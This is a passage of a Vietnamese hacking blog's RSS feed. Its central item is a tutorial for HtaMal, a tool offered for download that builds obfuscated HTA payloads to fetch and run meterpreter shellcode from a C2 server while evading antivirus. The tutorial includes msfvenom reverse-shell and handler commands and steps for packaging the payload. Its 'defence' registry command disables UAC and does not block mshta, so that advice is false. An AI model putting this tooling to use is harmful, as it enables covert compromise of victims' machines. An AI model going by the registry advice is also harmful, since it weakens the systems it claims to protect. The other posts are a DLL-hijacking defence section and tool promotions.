<figure id="attachment_82310" aria-describedby="caption-attachment-82310" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-8.jpg" alt="Cách phát hiện DLL Hijacking" width="600" height="400" title="Cách khai thác lỗ hổng DLL Hijacking trên Windows 47"><figcaption id="caption-attachment-82310" class="wp-caption-text">Cách phát hiện DLL Hijacking</figcaption></figure>
<h4><strong>2. Tận dụng DLLSpy</strong></h4>
<p><a href="https://github.com/cyberark/DLLSpy" rel="noopener">DLLSpy</a> là giải pháp gọn nhẹ, chuyên biệt để phát hiện nguy cơ DLL Hijacking:</p>
<p><strong>Cách thực hiện:</strong></p>
<ol>
<li>Khởi động DLLSpy trên máy tính.</li>
<li>Công cụ sẽ rà soát các tiến trình đang chạy, kiểm tra cách chúng tìm kiếm DLL.</li>
<li>DLLSpy đưa ra danh sách những ứng dụng có thể bị tấn công nếu chúng ưu tiên tìm DLL từ các thư mục không đáng tin (như thư mục cá nhân hoặc đường dẫn bất thường).</li>
</ol>
<p><strong>Điểm mạnh:</strong> DLLSpy tự động hóa việc phân tích, giúp nhanh chóng chỉ ra các phần mềm dễ tổn thương mà không cần thao tác thủ công như với Process Monitor.</p>
<p>Ví dụ: Khi kiểm tra Dism.exe, DLLSpy có thể phát hiện xem nó tìm DismCore.dll ở đâu ngoài System32 hay không.</p>
<h4><strong>3. Kiểm tra trình tự tải DLL qua Dependency Walker</strong></h4>
<p>Tải về <a href="https://www.dependencywalker.com/" rel="noopener">Dependency Walker</a> (miễn phí) để xem xét các DLL mà phần mềm cần dùng.<br />
Khởi chạy ứng dụng trong công cụ này, sau đó quan sát danh sách DLL cùng đường dẫn nạp. Nếu phát hiện DLL được lấy từ nơi không chính thống, đó là tín hiệu cảnh báo.</p>
<h4><strong>4. Lưu ý dấu hiệu bất thường</strong></h4>
<ul>
<li>Khi một phần mềm quen thuộc (như Dism.exe) hoạt động kỳ lạ (hiển thị thông điệp lạ lùng hoặc gặp lỗi), có khả năng DLL đã bị thay thế.</li>
<li>Sử dụng Task Manager hoặc Process Explorer để kiểm tra các tiến trình liên quan và xác minh nguồn gốc tập tin.</li>
</ul>
<h3><strong>Những biện pháp ngăn ngừa lỗ hổng DLL Hijacking</strong></h3>
<h4><strong>1. Giới hạn quyền truy cập thư mục</strong></h4>
<ul>
<li>Đảm bảo chỉ tài khoản quản trị viên mới được phép ghi dữ liệu vào các thư mục quan trọng như C:\Windows\System32.</li>
<li>Tránh khởi chạy ứng dụng từ những nơi không an toàn (ví dụ: C:\Downloads), vì kẻ tấn công có thể đặt DLL giả mạo tại đó.</li>
</ul>
<figure id="attachment_82311" aria-describedby="caption-attachment-82311" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2025/03/dll-hijacking-9.jpg" alt="Những biện pháp ngăn ngừa lỗ hổng DLL Hijacking" width="600" height="400" title="Cách khai thác lỗ hổng DLL Hijacking trên Windows 48"><figcaption id="caption-attachment-82311" class="wp-caption-text">Những biện pháp ngăn ngừa lỗ hổng DLL Hijacking</figcaption></figure>
<h4><strong>2. Áp dụng đường dẫn cố định trong lập trình</strong></h4>
<p>Nếu bạn phát triển phần mềm, hãy cấu hình để chương trình gọi DLL bằng đường dẫn rõ ràng (như C:\Windows\System32\DismCore.dll), thay vì để nó tự do tìm kiếm.</p>
<h4><strong>3. Bật chế độ SafeDLLSearchMode</strong></h4>
<p>Kiểm tra và đặt giá trị SafeDllSearchMode trong Registry (tại <strong>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager</strong>) thành 1, để ưu tiên các thư mục hệ thống trước tiên.</p>
<h4><strong>4. Triển khai công cụ bảo vệ</strong></h4>
<p>Sử dụng phần mềm diệt virus hoặc chống mã độc (như Malwarebytes, Kaspersky,…) để nhận diện và ngăn chặn các DLL nguy hiểm kịp thời.</p>
<h2><strong>Kết luận</strong></h2>
<p><strong>DLL Hijacking</strong> không chỉ là một kỹ thuật tấn công mà còn là lời cảnh báo về tầm quan trọng của bảo mật phần mềm. Với các công cụ như Process Monitor, bạn có thể vừa khai thác vừa phòng chống lỗ hổng này một cách hiệu quả. Thế giới bảo mật còn vô vàn điều thú vị đang chờ bạn khám phá. Hãy bắt đầu từ hôm nay, biến kiến thức thành sức mạnh và luôn cẩn thận trong từng bước đi nhé!</p>
<h2>Câu hỏi thường gặp</h2>
<h3>DLL Hijacking là gì và nó hoạt động như thế nào?</h3>
<p>DLL Hijacking là một kỹ thuật tấn công tận dụng việc một chương trình tải DLL từ một vị trí không mong muốn.  Hacker đặt một DLL độc hại vào một thư mục mà chương trình tìm kiếm trước khi đến thư mục chính thống, khiến chương trình tải mã độc thay vì DLL hợp lệ.</p>
<h3>Tại sao Dism.exe thường được nhắm mục tiêu trong các cuộc tấn công DLL Hijacking?</h3>
<p>Dism.exe là một công cụ hệ thống quan trọng, thường được sử dụng và nằm trong thư mục hệ thống. Việc kiểm tra đường dẫn tải DLL của nó đôi khi không đủ chặt chẽ, tạo điều kiện cho việc chèn DLL giả mạo.</p>
<h3>Tôi có thể làm gì để bảo vệ hệ thống của mình khỏi bị tấn công DLL Hijacking?</h3>
<p>Luôn cập nhật hệ điều hành và phần mềm của bạn lên phiên bản mới nhất, sử dụng phần mềm diệt virus đáng tin cậy và kiểm soát chặt chẽ quyền truy cập vào các thư mục hệ thống.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-khai-thac-lo-hong-dll-hijacking-tren-windows/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus</title>
		<link>https://anonyviet.com/htamal-ky-thuat-thuc-thi-shellcode/</link>
					<comments>https://anonyviet.com/htamal-ky-thuat-thuc-thi-shellcode/#comments</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Mon, 10 Feb 2025 12:02:41 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[hta]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[payload]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=80296</guid>

					<description><![CDATA[Việc thực thi mã độc mà không bị phát hiện bởi các phần mềm diệt virus (Antivirus) là một thách thức không nhỏ đối với cả bên tấn công lẫn phòng thủ. Hôm nay, chúng ta sẽ khám phá một công cụ mang tên HtaMal, một phương pháp sáng tạo cho phép thực thi shellcode [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Việc thực thi mã độc mà không bị phát hiện bởi các phần mềm diệt virus (Antivirus) là một thách thức không nhỏ đối với cả bên tấn công lẫn phòng thủ. Hôm nay, chúng ta sẽ khám phá một công cụ mang tên <strong>HtaMal</strong>, một phương pháp sáng tạo cho phép thực thi <strong>shellcode từ xa</strong> trong môi trường Windows, đồng thời <strong>vượt qua các cơ chế phát hiện của Antivirus</strong> một cách hiệu quả. Kỹ thuật này lợi dụng <strong>HTA (HTML Application) và JavaScript</strong>, cho phép kẻ tấn công tải và thực thi shellcode trực tiếp từ xa, từ đó giảm thiểu khả năng bị phát hiện. Được rồi, không dài dòng nữa vào luôn vấn đề chính thôi !</p>
<p><strong><em>Lưu ý: Bài viết này chỉ dành cho mục đích nghiên cứu, học tập. Anonyviet sẽ không chịu bất cứ mọi hành vi bất hợp pháp nào !</em></strong></p>
<h2><strong>Khái niệm ngắn gọn về HTA và phương thức tấn công</strong></h2>
<h3><strong>HTA là gì?</strong></h3>
<p>HTA (HTML Application) là một loại ứng dụng dựa trên HTML do Microsoft phát triển, có thể thực thi trực tiếp thông qua <strong>mshta.exe</strong> mà không bị hạn chế bởi sandbox của trình duyệt. Chính vì thế HTA trở thành một công cụ hữu ích cho các tác vụ tự động hóa hợp pháp, nhưng cũng là một công cụ lợi hại trong tay hacker</p>
<h3><strong>Tại sao HTA có thể bị lạm dụng?</strong></h3>
<ul>
<li><strong>Chạy với quyền cao</strong>: HTA có thể thực thi <strong>VBScript/JavaScript</strong> với quyền của người dùng mà không cần hiển thị cửa sổ cảnh báo như khi chạy script thông thường</li>
<li><strong>Không cần ghi file</strong>: Hacker có thể tải HTA từ xa mà không cần lưu trữ nội dung độc hại trên máy nạn nhân</li>
<li><strong>Bỏ qua một số giải pháp bảo mật</strong>: Một số phần mềm Antivirus không quét HTA kỹ như các file thực thi khác (.exe, .dll), tạo ra cơ hội bypass</li>
</ul>
<h2><strong>Cách thức hoạt động của payload HtaMal</strong></h2>
<p>HtaMal là một công cụ tạo ra 1 payload <strong>HTA để thực thi shellcode từ xa</strong>, giúp tránh bị phát hiện bởi Antivirus. Quy trình tổng quát như sau:</p>
<p><strong>Tạo file HTA chứa mã JavaScript độc hại</strong></p>
<ul>
<li>Trong source code của tool mình đã xáo trộn payload ở trang <a href="https://obfuscator.io/" rel="noopener">https://obfuscator.io/</a>, bạn có thể xem các source code của payload ở phần cuối trong source tool</li>
<li>Payload của HtaMal sẽ chuyển tên file, url và lệnh thực thi sang hex và 2 tệp: <strong>autoit.exe và loader.a3x</strong> được mã hóa bằng thuật toán XOR. Khi payload thực thi trên máy nạn nhân, nó sẽ tự giải mã và thực thi lệnh trong thư mục %appdata%</li>
</ul>
<p><strong>Tải shellcode từ máy chủ C2: </strong>Khi người dùng mở file HTA, script <strong>loader.a3x</strong> sẽ lấy shellcode từ server của hacker</p>
<p><strong>Lợi dụng chữ ký số (Digital Signature) hợp lệ của file autoit.exe để bypass Antivirus</strong></p>
<ul>
<li>Mình đã compile script loader.au3 sang loader.a3x, khi chạy lệnh <strong>autoit.exe loader.a3x &lt;hex_url_shellcode&gt;</strong> thực hiện <strong>tải xuống và thực thi shellcode từ xa</strong>, bằng cách sử dụng các hàm <a href="https://learn.microsoft.com/en-us/windows/win32/apiindex/windows-api-list" rel="noopener">Windows API</a> để cấp phát bộ nhớ, sao chép shellcode vào vùng nhớ đã cấp phát, sau đó tạo một luồng mới để thực thi shellcode.</li>
<li>Một trong những kỹ thuật <strong>Bypass Antivirus (AV) </strong>phổ biến là <strong>lợi dụng chữ ký số hợp lệ của phần mềm hợp pháp</strong> để thực thi mã độc. Trong trường hợp này, mình đã <strong>lợi dụng AutoIt.exe có chữ ký số hợp lệ</strong> để tránh bị phát hiện bởi phần mềm bảo mật</li>
</ul>
<p><strong>HtaMal &#8211; Công cụ tạo payload thực thi Shellcode từ xa Bypass Antivirus</strong></p>
<p>Để sử dụng công cụ này, bạn cần phải tải Python về máy, sau đó tải source code của tool <a href="https://www.mediafire.com/file/8455ry5a5v2d24g/HtaMal.zip/file" rel="noopener">tại đây</a>, sau khi tải xong bạn giải nén ra và trải nghiệm thôi ( Pass giải nén: anonyviet.com )</p>
<p>Trước khi sử dụng HtaMal, chúng ta cần phải tạo ra một shellcode, ở đây mình sẽ sử dụng Metasploit để tạo với câu lệnh:</p>
<p><code>msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.33 lport=8443 -f raw -o shellcode.bin</code></p>
<p><code>#Setup môi trường lệnh tấn công</code></p>
<p><code>msfconsole</code></p>
<p><code>use exploit/multi/handler</code></p>
<p><code>set payload windows/x64/meterpreter/reverse_https</code></p>
<p><code>set lhost=your ip address</code></p>
<p><code>set lport=your port</code></p>
<p><code>run</code></p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-1.png" alt="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 32" width="600" height="89" title="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 53"></p>
<p>Tiếp đến, chạy lệnh python3 -m http.server 80 để mở ra server lưu trữ file <strong>shellcode.bin </strong>và python3 htamal.py để chạy tool. Bây giờ mình sẽ nhập url chứa shellcode của mình<br />
<img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-2.png" alt="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 33" width="990" height="401" title="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 54"></p>
<p>Như vậy đã xong, bây giờ mình sẽ nén payload <strong>hta_payload.hta</strong> thành file zip với mật khẩu là 123123@</p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2025/02/word-image-80301-3.png" alt="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 34" width="646" height="506" title="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 55"></p>
<p>Và đây là kết quả:</p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2025/02/a-screenshot-of-a-computer-ai-generated-content-m.png" alt="A screenshot of a computer AI-generated content may be incorrect." width="1598" height="923" title="Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 56"></p>
<p>Video demo:</p>
<p><iframe loading="lazy" class="wp-embedded-content" sandbox="allow-scripts" security="restricted" title="HtaMal" src="https://streamable.com/o/cd36kf#?secret=7yxcR1Anc4" data-secret="7yxcR1Anc4" frameborder="0" scrolling="no" width="1280" height="720"></iframe></p>
<h2><strong>Cách phòng chống tấn công bằng HTA</strong></h2>
<p>Do mshta.exe hiếm khi cần thiết trong môi trường doanh nghiệp, chặn mshta.exe là một cách đơn giản để giảm nguy cơ bị tấn công. Có thể thực hiện bằng cách:</p>
<p><code>Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0</code></p>
<p>Hoặc trong Group Policy:</p>
<ul>
<li><strong>Computer Configuration → Windows Settings → Security Settings → Software Restriction Policies</strong></li>
<li>Thêm <strong>mshta.exe</strong> vào danh sách bị chặn</li>
</ul>
<p>HtaMal là một công giúp tạo payload thực thi shellcode từ xa, sử dụng các kỹ thuật <strong>bypass Antivirus (AV) </strong>để tránh bị phát hiện. Bằng cách kết hợp <strong>HTA (HTML Application)</strong> với <strong>AutoIt</strong>, công cụ này có thể thực thi mã độc trực tiếp trong bộ nhớ. Tuy nhiên, điều quan trọng cần nhấn mạnh là <strong>HtaMal chỉ được sử dụng cho mục đích nghiên cứu bảo mật và kiểm thử xâm nhập hợp pháp</strong>.</p>
<p>Để phòng chống các kỹ thuật bypass AV như HtaMal, cần phải:<br />
🔹 Giám sát tiến trình đáng ngờ, đặc biệt là AutoIt.exe.<br />
🔹 Hạn chế thực thi HTA trên hệ thống nếu không cần thiết.<br />
🔹 Áp dụng các cơ chế bảo vệ nâng cao như Application Whitelisting, AMSI Logging, và Behavioral Analysis.</p>
<p>👉 <strong>Bạn nghĩ gì về phương pháp này? Có cách nào cải thiện khả năng phát hiện của AV để chống lại kỹ thuật này không? Hãy chia sẻ ý kiến của bạn! 🚀</strong></p>
<h2>Câu hỏi thường gặp</h2>
<h3>HTA (HTML Application) là gì và tại sao nó lại dễ bị lợi dụng trong tấn công?</h3>
<p>HTA là ứng dụng dựa trên HTML, có thể chạy trực tiếp bằng mshta.exe mà không bị hạn chế bởi sandbox trình duyệt. Điều này cho phép nó thực thi VBScript/JavaScript với quyền người dùng, tải mã độc từ xa mà không cần lưu file, và bỏ qua một số cơ chế bảo mật của Antivirus.</p>
<h3>HtaMal hoạt động như thế nào để thực thi shellcode từ xa và vượt qua Antivirus?</h3>
<p>HtaMal tạo payload HTA chứa mã JavaScript, tải shellcode từ máy chủ C2, và lợi dụng AutoIt.exe (có chữ ký số hợp lệ) để giải mã và thực thi shellcode trong bộ nhớ, qua đó tránh bị phát hiện.</p>
<h3>Làm thế nào để phòng chống các cuộc tấn công sử dụng kỹ thuật tương tự như HtaMal?</h3>
<p>Chặn mshta.exe, giám sát tiến trình đáng ngờ (như AutoIt.exe), hạn chế thực thi HTA, và áp dụng các cơ chế bảo vệ nâng cao như Application Whitelisting, AMSI Logging, và Behavioral Analysis.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/htamal-ky-thuat-thuc-thi-shellcode/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn</title>
		<link>https://anonyviet.com/snov-io-email-finder-tim-kiem-email-chi-voi-ten-cong-ty-ten-mien-ho-so-linkedin/</link>
					<comments>https://anonyviet.com/snov-io-email-finder-tim-kiem-email-chi-voi-ten-cong-ty-ten-mien-ho-so-linkedin/#respond</comments>
		
		<dc:creator><![CDATA[Thanh Kim]]></dc:creator>
		<pubDate>Sat, 14 Dec 2024 12:47:44 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[OSINT]]></category>
		<category><![CDATA[Snov.io Email Finder]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=65549</guid>

					<description><![CDATA[Bạn đang mệt mỏi vì phải tìm kiếm địa chỉ email thủ công, tốn thời gian và công sức mà hiệu quả lại không cao? Hãy để Snov.io Email Finder giúp bạn! Công cụ này sẽ giúp bạn tìm kiếm và xác thực địa chỉ email một cách nhanh chóng và chính xác, giúp bạn [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Bạn đang mệt mỏi vì phải tìm kiếm địa chỉ email thủ công, tốn thời gian và công sức mà hiệu quả lại không cao? Hãy để <strong>Snov.io Email Finder</strong> giúp bạn! Công cụ này sẽ giúp bạn tìm kiếm và xác thực địa chỉ email một cách nhanh chóng và chính xác, giúp bạn tập trung vào những việc quan trọng hơn và nâng cao hiệu quả công việc.</p>
<h2><strong>Snov.io Email Finder là gì?</strong></h2>
<p><strong>Snov.io Email Finde</strong>r là một công cụ giúp bạn nhanh chóng tìm và xác minh địa chỉ email, giúp việc kết nối với đúng người trở nên dễ dàng hơn. Dù bạn đang làm công việc tiếp thị bán hàng, tuyển dụng hay đơn giản là muốn mở rộng mạng lưới của mình, công cụ này cho phép bạn tìm kiếm email dựa trên tên người, tên miền của công ty, hoặc thậm chí chỉ cần một hồ sơ LinkedIn.</p>
<figure id="attachment_65540" aria-describedby="caption-attachment-65540" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-1.jpg" alt="Snov.io Email Finder là gì?" width="800" height="601" title="Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 66"><figcaption id="caption-attachment-65540" class="wp-caption-text">Snov.io Email Finder là gì?</figcaption></figure>
<h3><strong>Tính năng xác thực thông minh của Snov.io Email Finder</strong></h3>
<p>Không chỉ tìm kiếm, Snov.io Email Finder còn giúp bạn xác thực địa chỉ email, đảm bảo email bạn gửi đến đúng người nhận và tránh bị trả lại. Điều này giúp:</p>
<ul>
<li>Email của bạn không bị rơi vào hộp thư rác, Snov.io giúp bạn loại bỏ những địa chỉ email không tồn tại.</li>
<li>Gửi email đến đúng người nhận giúp tăng khả năng email được đọc và tương tác, mang lại hiệu quả tốt hơn cho chiến dịch marketing của bạn.</li>
<li>Bạn không cần phải mất thời gian kiểm tra từng địa chỉ email một cách thủ công.</li>
</ul>
<figure id="attachment_65541" aria-describedby="caption-attachment-65541" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-2.jpg" alt="Snov.io Email Finder có tính năng xác thực hữu ích" width="800" height="400" title="Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 67"><figcaption id="caption-attachment-65541" class="wp-caption-text">Snov.io Email Finder có tính năng xác thực hữu ích</figcaption></figure>
<h3><strong>Kết nối Snov.io với các công cụ khác</strong></h3>
<p>Snov.io Email Finder có thể kết nối với nhiều công cụ khác, giúp công việc của bạn trở nên thuận tiện hơn:</p>
<ul>
<li>Kết nối với CRM để tự động cập nhật danh sách liên lạc và quản lý thông tin khách hàng hiệu quả.</li>
<li>Kết nối với các công cụ email marketing như Mailchimp để tạo danh sách gửi email và theo dõi hiệu quả.</li>
<li>Kết hợp với các công cụ tự động hóa marketing để xây dựng quy trình tìm kiếm và liên hệ khách hàng tự động.</li>
</ul>
<p><span style="color: #339966;"><em><strong>Xem thêm: <a href="https://anonyviet.com/cach-hacker-bypass-av-xam-nhap-windows-voi-autoit/">Cách Hacker Bypass AV xâm nhập Windows với Autoit</a></strong></em></span></p>
<h2><strong>Hướng dẫn sử dụng Snov.io Email Finder</strong></h2>
<h3><strong>Sử dụng trên web</strong></h3>
<p>Cách dùng rất đơn giản, bạn chỉ cần truy cập<strong><a href="https://snov.io/email-finder" target="_blank" rel="noopener"><span style="text-decoration: underline;"> trang web của Snov.io</span></a></strong> &gt; Nhập tên công ty/ website/ tên người &gt; Nhấn ‘Find emails’ là xong.</p>
<p><img decoding="async" class="alignnone size-full " src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-3.jpg" alt="Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 36" width="800" height="460" title="Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 68"></p>
<h3><strong>Sử dụng qua extension</strong></h3>
<p>Bạn có thể cài đặt Snov.io Chrome Extension để dễ dàng tìm kiếm các địa chỉ email khi truy cập bất kì website nào</p>
<p><strong>Bước 1:</strong> Truy cập trang cài đặt<strong><a href="https://chromewebstore.google.com/detail/email-finder-by-snovio/einnffiilpmgldkapbikhkeicohlaapj" target="_blank" rel="noopener"><span style="text-decoration: underline;"> Snov.io Chrome Extension</span></a></strong> &gt; Nhấn Tải về</p>
<figure id="attachment_65543" aria-describedby="caption-attachment-65543" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-4.jpg" alt="Tải extension Email Finder by Snov.io" width="800" height="133" title="Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 69"><figcaption id="caption-attachment-65543" class="wp-caption-text">Tải extension Email Finder by Snov.io</figcaption></figure>
<p><strong>Bước 2:</strong> Truy cập trang web của công ty bất kì.</p>
<p><strong>Bước 3:</strong> Kích hoạt tiện ích Email Finder. Tiện ích này sẽ ngay lập tức bắt đầu quá trình tìm kiếm email, và kết quả sẽ được tổng hợp trong một danh sách riêng mà bạn có thể dễ dàng tùy chỉnh với tiêu đề phù hợp.</p>
<figure id="attachment_65544" aria-describedby="caption-attachment-65544" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-5.jpg" alt="Kích hoạt tiện ích Email Finder" width="800" height="407" title="Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 70"><figcaption id="caption-attachment-65544" class="wp-caption-text">Kích hoạt tiện ích Email Finder</figcaption></figure>
<p>Ngoài ra, khi bạn nhấp vào phần ‘Prospects’, bạn có thể khám phá vị trí của các ‘đối tượng tiềm năng’ trong công ty, bạn còn có thể truy cập thông tin mạng xã hội của họ (ví dụ như LinkedIn), giúp bạn có thêm thông tin liên hệ.</p>
<figure id="attachment_65545" aria-describedby="caption-attachment-65545" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-6.jpg" alt="Khám phá vị trí của các ‘đối tượng tiềm năng’ trong công ty" width="800" height="506" title="Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 71"><figcaption id="caption-attachment-65545" class="wp-caption-text">Khám phá vị trí của các ‘đối tượng tiềm năng’ trong công ty</figcaption></figure>
<h3><strong>Tìm kiếm email miễn phí trên LinkedIn với LI Prospect Finder</strong></h3>
<p>Snov.io cũng cung cấp một tiện ích mở rộng Chrome khác &#8211; LI Prospect Finder &#8211; cho phép bạn tìm kiếm email miễn phí trên LinkedIn. Tiện ích này tích hợp trực tiếp với thanh tìm kiếm LinkedIn, giúp bạn dễ dàng tìm kiếm email mà không cần phải điều chỉnh thủ công.</p>
<p><strong>Bước 1:</strong> Để sử dụng, chỉ cần tải xuống <strong><a href="https://chromewebstore.google.com/detail/li-prospect-finder/mdhjhplkmldfjgoegbdmallcdhlecfcn" target="_blank" rel="noopener"><span style="text-decoration: underline;">LI Prospect Finder</span></a></strong> &gt; Truy cập LinkedIn và bắt đầu tìm kiếm.</p>
<figure id="attachment_65546" aria-describedby="caption-attachment-65546" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-7.jpg" alt="Tải xuống LI Prospect Finder" width="800" height="155" title="Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 72"><figcaption id="caption-attachment-65546" class="wp-caption-text">Tải xuống LI Prospect Finder</figcaption></figure>
<p><strong>Bước 2:</strong> Nhập chức danh công việc của đối tượng tiềm năng, áp dụng các bộ lọc (như People, Jobs, Connections, Locations, hoặc Current Company) &gt; Sau đó kích hoạt tiện ích.</p>
<figure id="attachment_65547" aria-describedby="caption-attachment-65547" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-8.jpg" alt="Nhập chức danh công việc của đối tượng" width="800" height="353" title="Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 73"><figcaption id="caption-attachment-65547" class="wp-caption-text">Nhập chức danh công việc của đối tượng</figcaption></figure>
<p><strong>Bước 3:</strong> Sau đó, chỉ cần nhấp ‘Save’ để lưu các địa chỉ email đã được xác minh vào một thư mục riêng trong ứng dụng web của Snov.io.</p>
<figure id="attachment_65548" aria-describedby="caption-attachment-65548" style="width: 800px" class="wp-caption aligncenter"><img decoding="async" class=" size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/snov-io-email-finder-9.jpg" alt="Lưu lại các địa chỉ email đã được xác minh" width="800" height="325" title="Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 74"><figcaption id="caption-attachment-65548" class="wp-caption-text">Lưu lại các địa chỉ email đã được xác minh</figcaption></figure>
<p>Tại sao lại nói là đã được xác minh? Đó là bởi vì tất cả các công cụ tìm kiếm email của Snov.io đều được trang bị công cụ Email Verifier tích hợp sẵn, giúp bạn không cần phải tự kiểm tra tính hợp lệ của email,</p>
<p>Mỗi email sẽ có 1 chấm tròn màu bên cạnh: Màu xanh lá tức email đã xác minh, màu vàng tức email cần xem xét, và màu đỏ tức là các địa chỉ không tồn tại.</p>
<p><span style="color: #339966;"><em><strong>Xem thêm:<a href="https://anonyviet.com/huong-dan-active-burp-suite-pro-2024-bugbounty-pro-moi-nhat/"> Hướng dẫn Active Burp Suite Pro 2024 + BugBounty Pro mới nhất</a></strong></em></span></p>
<h2><strong>Lời Kết</strong></h2>
<p><strong>Snov.io Email Finder</strong> không chỉ là một công cụ tìm kiếm email, mà còn là một giải pháp toàn diện giúp bạn kết nối với khách hàng tiềm năng, xây dựng mối quan hệ vững chắc và phát triển doanh nghiệp. Hãy trải nghiệm ngay hôm nay nhé!</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Snov.io Email Finder có hoạt động như thế nào?</h3>
<p>Snov.io Email Finder là một công cụ tìm kiếm và xác thực địa chỉ email. Bạn chỉ cần nhập tên công ty, tên miền hoặc hồ sơ LinkedIn, công cụ sẽ tìm kiếm và xác minh các địa chỉ email chính xác, giúp bạn tiết kiệm thời gian và công sức.</p>
<h3>Tôi có thể sử dụng Snov.io Email Finder trên thiết bị nào?</h3>
<p>Bạn có thể sử dụng Snov.io Email Finder trực tiếp trên website hoặc thông qua tiện ích mở rộng Chrome (extension). Tiện ích mở rộng giúp tìm kiếm email dễ dàng hơn khi bạn đang duyệt web.</p>
<h3>Snov.io Email Finder có tích hợp với các công cụ khác không?</h3>
<p>Có, Snov.io Email Finder có thể tích hợp với nhiều công cụ khác như CRM và các công cụ email marketing, giúp bạn quản lý thông tin khách hàng và tự động hóa các chiến dịch marketing hiệu quả hơn.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/snov-io-email-finder-tim-kiem-email-chi-voi-ten-cong-ty-ten-mien-ho-so-linkedin/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp</title>
		<link>https://anonyviet.com/capsolver-giai-phap-tu-dong-giai-captcha-danh-cho-doanh-nghiep/</link>
					<comments>https://anonyviet.com/capsolver-giai-phap-tu-dong-giai-captcha-danh-cho-doanh-nghiep/#respond</comments>
		
		<dc:creator><![CDATA[Thanh Kim]]></dc:creator>
		<pubDate>Wed, 11 Dec 2024 22:47:42 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[Capsolver]]></category>
		<category><![CDATA[captcha]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=66033</guid>

					<description><![CDATA[Trong thời đại kỹ thuật số, việc tự động hóa các tác vụ trực tuyến đã trở nên phổ biến hơn bao giờ hết. Tuy nhiên, sự hiện diện của CAPTCHA &#8211; một hệ thống kiểm tra nhằm phân biệt người dùng thật và bot &#8211; thường gây ra trở ngại đáng kể cho quá [&#8230;]]]></description>
